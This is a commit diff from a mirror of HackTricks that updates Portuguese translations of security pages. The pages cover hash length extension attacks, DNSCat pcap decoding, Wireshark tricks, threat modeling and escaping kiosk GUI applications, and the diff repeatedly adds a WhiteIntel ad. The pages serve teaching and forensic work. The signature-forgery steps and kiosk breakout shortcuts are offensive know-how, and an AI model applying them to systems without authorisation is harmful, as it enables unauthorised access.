Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 14:38:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

Browse source
This commit is contained in:
Translator 2024-04-18 03:34:33 +00:00
parent 26cc126c8f
commit 0e3994bd98
34 changed files with 1408 additions and 586 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
crypto-and-stego/hash-length-extension-attack.md
View file

@ -4,27 +4,40 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** repositórios [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) do github.
* **Compartilhe seus truques de hacking enviando PRs para os** repositórios [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
# Resumo do ataque
Imagine um servidor que está **assinando** alguns **dados** ao **anexar** um **segredo** a alguns dados de texto claro conhecidos e então fazendo o hash desses dados. Se você souber:
Imagine um servidor que está **assinando** alguns **dados** ao **anexar** um **segredo** a alguns dados de texto claro conhecidos e, em seguida, fazendo o hash desses dados. Se você souber:
* **O comprimento do segredo** (isso também pode ser forçado por força bruta a partir de uma faixa de comprimento fornecida)
* **Os dados de texto claro**
* **O algoritmo (e que é vulnerável a esse ataque)**
* **O algoritmo (e que é vulnerável a este ataque)**
* **O preenchimento é conhecido**
* Geralmente um padrão é usado, então se os outros 3 requisitos forem atendidos, este também é
* Geralmente, um padrão é usado, então se os outros 3 requisitos forem atendidos, este também é
* O preenchimento varia dependendo do comprimento do segredo+dados, por isso o comprimento do segredo é necessário
Então, é possível para um **atacante** **anexar** **dados** e **gerar** uma **assinatura** válida para os **dados anteriores + dados anexados**.
Então, é possível para um **atacante** **anexar** **dados** e **gerar** uma assinatura válida para os **dados anteriores + dados anexados**.
## Como?
@ -34,7 +47,7 @@ Então, imagine que o segredo é "secreto" e os dados são "dados", o MD5 de "se
Se um atacante quiser anexar a string "anexar" ele pode:
* Gerar um MD5 de 64 "A"s
* Alterar o estado do hash inicializado anteriormente para 6036708eba0d11f6ef52ad44e8b74d5b
* Alterar o estado do hash previamente inicializado para 6036708eba0d11f6ef52ad44e8b74d5b
* Anexar a string "anexar"
* Finalizar o hash e o hash resultante será um **válido para "secreto" + "dados" + "preenchimento" + "anexar"**
@ -42,10 +55,21 @@ Se um atacante quiser anexar a string "anexar" ele pode:
{% embed url="https://github.com/iagox86/hash_extender" %}
# Referências
## Referências
Você pode encontrar este ataque bem explicado em [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
@ -53,10 +77,10 @@ Você pode encontrar este ataque bem explicado em [https://blog.skullsecurity.or
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** repositórios [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) do github.
* **Compartilhe seus truques de hacking enviando PRs para os** repositórios [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

21
forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
View file

@ -8,14 +8,27 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
Se você tiver um pcap com dados sendo **exfiltrados pelo DNSCat** (sem usar criptografia), você pode encontrar o conteúdo exfiltrado.
Você só precisa saber que os **primeiros 9 bytes** não são dados reais, mas estão relacionados com a **comunicação C\&C**:
Você só precisa saber que os **primeiros 9 bytes** não são dados reais, mas estão relacionados à **comunicação C\&C**:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -39,7 +52,7 @@ Para mais informações: [https://github.com/jrmdev/ctf-writeups/tree/master/bsi
Existe um script que funciona com Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
```bash
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
@ -48,7 +61,7 @@ python3 dnscat_decoder.py sample.pcap bad_domain
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**

37
forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
View file

@ -16,6 +16,20 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Melhore suas habilidades no Wireshark
### Tutoriais
@ -73,7 +87,7 @@ Em _**Statistics --> I/O Graph**_ você pode encontrar um **gráfico da comunica
### Filtros
Aqui você pode encontrar filtro do wireshark dependendo do protocolo: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Aqui você pode encontrar filtros do wireshark dependendo do protocolo: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Outros filtros interessantes:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
@ -85,7 +99,7 @@ Outros filtros interessantes:
### Pesquisa
Se você deseja **pesquisar** por **conteúdo** dentro dos **pacotes** das sessões, pressione _CTRL+f_. Você pode adicionar novas camadas à barra de informações principal (No., Time, Source, etc.) pressionando o botão direito e, em seguida, editar a coluna.
Se você deseja **pesquisar** por **conteúdo** dentro dos **pacotes** das sessões, pressione _CTRL+f_. Você pode adicionar novas camadas à barra de informações principal (No., Time, Source, etc.) pressionando o botão direito e depois editar a coluna.
### Laboratórios pcap gratuitos
@ -136,10 +150,9 @@ Um arquivo de chaves compartilhadas terá este aspecto:
Para importar isso no wireshark, vá para \_edit > preference > protocol > ssl > e importe em (Pre)-Master-Secret log filename:
![](<../../../.gitbook/assets/image (100).png>)
## Comunicação ADB
Extraia um APK de uma comunicação ADB onde o APK foi enviado:
Extrair um APK de uma comunicação ADB onde o APK foi enviado:
```python
from scapy.all import *
@ -166,16 +179,28 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

91
generic-methodologies-and-resources/threat-modeling.md
View file

@ -1,36 +1,50 @@
# Modelagem de Ameaças
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Modelagem de Ameaças
Bem-vindo ao guia abrangente da HackTricks sobre Modelagem de Ameaças! Embarque em uma exploração desse aspecto crítico da cibersegurança, onde identificamos, entendemos e estrategizamos contra possíveis vulnerabilidades em um sistema. Este tópico serve como um guia passo a passo repleto de exemplos do mundo real, software útil e explicações fáceis de entender. Ideal tanto para iniciantes quanto para profissionais experientes que desejam fortalecer suas defesas de cibersegurança.
Bem-vindo ao guia abrangente da HackTricks sobre Modelagem de Ameaças! Embarque em uma exploração deste aspecto crítico da cibersegurança, onde identificamos, entendemos e estrategizamos contra vulnerabilidades potenciais em um sistema. Este guia serve como um passo a passo repleto de exemplos do mundo real, software útil e explicações fáceis de entender. Ideal tanto para iniciantes quanto para profissionais experientes que buscam fortalecer suas defesas de cibersegurança.
### Cenários Comumente Utilizados
1. **Desenvolvimento de Software**: Como parte do Ciclo de Vida de Desenvolvimento de Software Seguro (SSDLC), a modelagem de ameaças ajuda a **identificar possíveis fontes de vulnerabilidades** nas primeiras etapas do desenvolvimento.
1. **Desenvolvimento de Software**: Como parte do Ciclo de Vida de Desenvolvimento de Software Seguro (SSDLC), a modelagem de ameaças ajuda a **identificar potenciais fontes de vulnerabilidades** nas fases iniciais do desenvolvimento.
2. **Teste de Penetração**: O framework Penetration Testing Execution Standard (PTES) requer a **modelagem de ameaças para entender as vulnerabilidades do sistema** antes de realizar o teste.
### Modelo de Ameaças em Resumo
### Modelo de Ameaça em Poucas Palavras
Um Modelo de Ameaças é tipicamente representado como um diagrama, imagem ou outra forma de ilustração visual que retrata a arquitetura planejada ou a construção existente de um aplicativo. Ele se assemelha a um **diagrama de fluxo de dados**, mas a principal distinção está em seu design orientado à segurança.
Um Modelo de Ameaça é tipicamente representado como um diagrama, imagem ou outra forma de ilustração visual que descreve a arquitetura planejada ou a construção existente de uma aplicação. Ele se assemelha a um **diagrama de fluxo de dados**, mas a distinção chave está em seu design orientado para a segurança.
Os modelos de ameaças frequentemente apresentam elementos marcados em vermelho, simbolizando vulnerabilidades, riscos ou barreiras potenciais. Para agilizar o processo de identificação de riscos, é empregada a tríade CIA (Confidencialidade, Integridade, Disponibilidade), que forma a base de muitas metodologias de modelagem de ameaças, sendo o STRIDE uma das mais comuns. No entanto, a metodologia escolhida pode variar dependendo do contexto e dos requisitos específicos.
Os modelos de ameaças frequentemente apresentam elementos marcados em vermelho, simbolizando vulnerabilidades potenciais, riscos ou barreiras. Para simplificar o processo de identificação de riscos, a tríade CIA (Confidencialidade, Integridade, Disponibilidade) é empregada, formando a base de muitas metodologias de modelagem de ameaças, sendo o STRIDE um dos mais comuns. No entanto, a metodologia escolhida pode variar dependendo do contexto e requisitos específicos.
### A Tríade CIA
A Tríade CIA é um modelo amplamente reconhecido no campo da segurança da informação, representando Confidencialidade, Integridade e Disponibilidade. Esses três pilares formam a base sobre a qual muitas medidas e políticas de segurança são construídas, incluindo metodologias de modelagem de ameaças.
A Tríade CIA é um modelo amplamente reconhecido no campo da segurança da informação, representando Confidencialidade, Integridade e Disponibilidade. Esses três pilares formam a base sobre a qual muitas medidas de segurança e políticas são construídas, incluindo metodologias de modelagem de ameaças.
1. **Confidencialidade**: Garantir que os dados ou o sistema não sejam acessados por pessoas não autorizadas. Esse é um aspecto central da segurança, exigindo controles de acesso apropriados, criptografia e outras medidas para evitar violações de dados.
2. **Integridade**: A precisão, consistência e confiabilidade dos dados ao longo de seu ciclo de vida. Esse princípio garante que os dados não sejam alterados ou adulterados por partes não autorizadas. Frequentemente envolve checksums, hashing e outros métodos de verificação de dados.
1. **Confidencialidade**: Garantir que os dados ou sistema não sejam acessados por indivíduos não autorizados. Este é um aspecto central da segurança, exigindo controles de acesso apropriados, criptografia e outras medidas para evitar violações de dados.
2. **Integridade**: A precisão, consistência e confiabilidade dos dados ao longo de seu ciclo de vida. Este princípio garante que os dados não sejam alterados ou adulterados por partes não autorizadas. Frequentemente envolve checksums, hashing e outros métodos de verificação de dados.
3. **Disponibilidade**: Isso garante que os dados e serviços sejam acessíveis aos usuários autorizados quando necessário. Isso frequentemente envolve redundância, tolerância a falhas e configurações de alta disponibilidade para manter os sistemas em funcionamento mesmo diante de interrupções.
### Metodologias de Modelagem de Ameaças
1. **STRIDE**: Desenvolvido pela Microsoft, STRIDE é um acrônimo para **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service e Elevation of Privilege**. Cada categoria representa um tipo de ameaça, e essa metodologia é comumente usada na fase de design de um programa ou sistema para identificar ameaças potenciais.
2. **DREAD**: Essa é outra metodologia da Microsoft usada para avaliação de riscos de ameaças identificadas. DREAD significa **Damage potential, Reproducibility, Exploitability, Affected users e Discoverability**. Cada um desses fatores recebe uma pontuação, e o resultado é usado para priorizar as ameaças identificadas.
3. **PASTA** (Process for Attack Simulation and Threat Analysis): Essa é uma metodologia de sete etapas, **centrada em riscos**. Inclui a definição e identificação de objetivos de segurança, criação de um escopo técnico, decomposição de aplicativos, análise de ameaças, análise de vulnerabilidades e avaliação de riscos/triagem.
4. **Trike**: Essa é uma metodologia baseada em riscos que se concentra na defesa de ativos. Ela parte de uma perspectiva de **gestão de riscos** e analisa ameaças e vulnerabilidades nesse contexto.
5. **VAST** (Visual, Agile e Simple Threat modeling): Essa abordagem visa ser mais acessível e se integra a ambientes de desenvolvimento ágil. Ela combina elementos das outras metodologias e se concentra em **representações visuais de ameaças**.
6. **OCTAVE** (Operationally Critical Threat, Asset e Vulnerability Evaluation): Desenvolvido pelo CERT Coordination Center, esse framework é voltado para **avaliação de riscos organizacionais, em vez de sistemas ou software específicos**.
2. **DREAD**: Esta é outra metodologia da Microsoft usada para avaliação de riscos de ameaças identificadas. DREAD significa **Damage potential, Reproducibility, Exploitability, Affected users e Discoverability**. Cada um desses fatores é pontuado, e o resultado é usado para priorizar as ameaças identificadas.
3. **PASTA** (Process for Attack Simulation and Threat Analysis): Esta é uma metodologia de sete etapas, centrada em **risco**. Inclui a definição e identificação de objetivos de segurança, criação de um escopo técnico, decomposição de aplicativos, análise de ameaças, análise de vulnerabilidades e avaliação de riscos/triagem.
4. **Trike**: Esta é uma metodologia baseada em risco que se concentra na defesa de ativos. Ela parte de uma perspectiva de **gestão de riscos** e analisa ameaças e vulnerabilidades nesse contexto.
5. **VAST** (Modelagem de Ameaças Visual, Ágil e Simples): Esta abordagem visa ser mais acessível e se integra a ambientes de desenvolvimento ágil. Ela combina elementos de outras metodologias e se concentra em **representações visuais de ameaças**.
6. **OCTAVE** (Avaliação de Ameaças, Ativos e Vulnerabilidades Operacionalmente Críticas): Desenvolvido pelo CERT Coordination Center, este framework é direcionado para **avaliação de riscos organizacionais em vez de sistemas ou software específicos**.
## Ferramentas
@ -38,11 +52,11 @@ Existem várias ferramentas e soluções de software disponíveis que podem **au
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
Uma avançada ferramenta gráfica multiplataforma de spider/crawler para profissionais de segurança cibernética. O Spider Suite pode ser usado para mapeamento e análise da superfície de ataque.
Uma avançada aranha/crawler web multiplataforma com interface gráfica para profissionais de segurança cibernética. O Spider Suite pode ser usado para mapeamento e análise da superfície de ataque.
**Uso**
1. Escolha um URL e faça o Crawl
1. Escolha um URL e Rastreie
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
@ -52,43 +66,43 @@ Uma avançada ferramenta gráfica multiplataforma de spider/crawler para profiss
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
Um projeto de código aberto da OWASP, o Threat Dragon é uma aplicação web e desktop que inclui diagramação de sistemas, bem como um mecanismo de regras para gerar automaticamente ameaças/mitigações.
Um projeto de código aberto da OWASP, o Threat Dragon é tanto uma aplicação web quanto desktop que inclui diagramação de sistemas, bem como um mecanismo de regras para gerar automaticamente ameaças/mitigações.
**Uso**
1. Crie um Novo Projeto
1. Criar Novo Projeto
<figure><img src="../.gitbook/assets/create_new_project_1.jpg" alt=""><figcaption></figcaption></figure>
Às vezes, pode parecer assim:
Às vezes pode parecer assim:
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
2. Inicie o Novo Projeto
2. Iniciar Novo Projeto
<figure><img src="../.gitbook/assets/launch_new_project_2.jpg" alt=""><figcaption></figcaption></figure>
3. Salve o Novo Projeto
3. Salvar o Novo Projeto
<figure><img src="../.gitbook/assets/save_new_project.jpg" alt=""><figcaption></figcaption></figure>
4. Crie seu modelo
4. Criar seu modelo
Você pode usar ferramentas como o SpiderSuite Crawler para se inspirar, um modelo básico ficaria assim
Você pode usar ferramentas como o SpiderSuite Crawler para se inspirar, um modelo básico se pareceria com isso
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
Apenas um pouco de explicação sobre as entidades:
Apenas um breve explicação sobre as entidades:
* Processo (A própria entidade, como um servidor web ou funcionalidade web)
* Ator (Uma pessoa, como um visitante do site, usuário ou administrador)
* Processo (A própria entidade, como um Servidor Web ou funcionalidade web)
* Ator (Uma pessoa, como um Visitante do Site, Usuário ou Administrador)
* Linha de Fluxo de Dados (Indicador de Interação)
* Limite de Confiança (Segmentos de rede ou escopos diferentes)
* Armazenar (Coisas onde os dados são armazenados, como bancos de dados)
* Limite de Confiança (Diferentes segmentos de rede ou escopos.)
* Armazenar (Locais onde os dados são armazenados, como Bancos de Dados)
5. Crie uma Ameaça (Passo 1)
5. Criar uma Ameaça (Passo 1)
Primeiro, você precisa escolher a camada à qual deseja adicionar uma ameaça
Primeiro você deve escolher a camada à qual deseja adicionar uma ameaça
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
@ -96,15 +110,28 @@ Agora você pode criar a ameaça
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
Lembre-se de que há uma diferença entre Ameaças de Ator e Ameaças de Processo. Se você adicionar uma ameaça a um Ator, só poderá escolher "Spoofing" e "Repudiation". No entanto, em nosso exemplo, adicionamos uma ameaça a uma entidade de Processo, então veremos isso na caixa de criação de ameaças:
Lembre-se de que há uma diferença entre Ameaças de Ator e Ameaças de Processo. Se você adicionasse uma ameaça a um Ator, só poderia escolher "Spoofing" e "Repudiation". No entanto, em nosso exemplo, adicionamos uma ameaça a uma entidade de Processo, então veremos isso na caixa de criação de ameaças:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. Concluído
Agora, seu modelo finalizado deve ficar assim. E assim você cria um modelo de ameaça simples com o OWASP Threat Dragon.
Agora seu modelo finalizado deve se parecer com isso. E assim você cria um modelo de ameaça simples com o OWASP Threat Dragon.
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Ferramenta de Modelagem de Ameaças da Microsoft](https://aka.ms/threatmodelingtool)
Esta é uma ferramenta gratuita da Microsoft que ajuda a encontrar ameaças na fase de design de projetos de software. Ela utiliza a metodologia STRIDE e é especialmente adequada para aqueles que desenvolvem na plataforma da Microsoft.
Esta é uma ferramenta gratuita da Microsoft que ajuda a encontrar ameaças na fase de design de projetos de software. Utiliza a metodologia STRIDE e é particularmente adequada para aqueles que desenvolvem na pilha da Microsoft.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O objetivo principal do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}

167
hardware-physical-access/escaping-from-gui-applications.md
View file

@ -2,9 +2,9 @@
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,23 +12,36 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
# Verifique possíveis ações dentro da aplicação GUI
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
**Diálogos comuns** são aquelas opções de **salvar um arquivo**, **abrir um arquivo**, selecionar uma fonte, uma cor... A maioria deles **oferecerá funcionalidade completa do Explorer**. Isso significa que você poderá acessar funcionalidades do Explorer se puder acessar essas opções:
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
# Verificar possíveis ações dentro da aplicação GUI
**Diálogos Comuns** são aquelas opções de **salvar um arquivo**, **abrir um arquivo**, selecionar uma fonte, uma cor... A maioria deles **oferecerá uma funcionalidade completa do Explorer**. Isso significa que você poderá acessar funcionalidades do Explorer se puder acessar essas opções:
* Fechar/Fechar como
* Abrir/Abrir com
* Imprimir
* Exportar/Importar
* Pesquisar
* Digitalizar
* Escanear
Você deve verificar se pode:
* Modificar ou criar novos arquivos
* Criar links simbólicos
* Obter acesso a áreas restritas
* Acessar áreas restritas
* Executar outros aplicativos
## Execução de Comandos
@ -50,9 +63,9 @@ _bash, sh, zsh..._ Mais aqui: [https://gtfobins.github.io/](https://gtfobins.git
* **Variáveis de ambiente**: Existem muitas variáveis de ambiente que apontam para algum caminho
* **Outros protocolos**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **Links simbólicos**
* **Atalhos**: CTRL+N (abrir nova sessão), CTRL+R (Executar Comandos), CTRL+SHIFT+ESC (Gerenciador de Tarefas), Windows+E (abrir explorer), CTRL-B, CTRL-I (Favoritos), CTRL-H (Histórico), CTRL-L, CTRL-O (Diálogo de Arquivo/Abrir), CTRL-P (Diálogo de Impressão), CTRL-S (Salvar Como)
* **Atalhos**: CTRL+N (abrir nova sessão), CTRL+R (Executar Comandos), CTRL+SHIFT+ESC (Gerenciador de Tarefas), Windows+E (abrir explorer), CTRL-B, CTRL-I (Favoritos), CTRL-H (Histórico), CTRL-L, CTRL-O (Diálogo Arquivo/Abrir), CTRL-P (Diálogo Imprimir), CTRL-S (Salvar Como)
* Menu Administrativo Oculto: CTRL-ALT-F8, CTRL-ESC-F9
* **URIs de Shell**: _shell:Ferramentas Administrativas, shell:Bibliotecas de Documentos, shell:Bibliotecas, shell:Perfis de Usuário, shell:Pessoal, shell:Pasta de Início de Pesquisa, shell:Pasta de Locais de Rede, shell:Enviar para, shell:Perfis de Usuário, shell:Ferramentas Administrativas Comuns, shell:Pasta Meu Computador, shell:Pasta Internet_
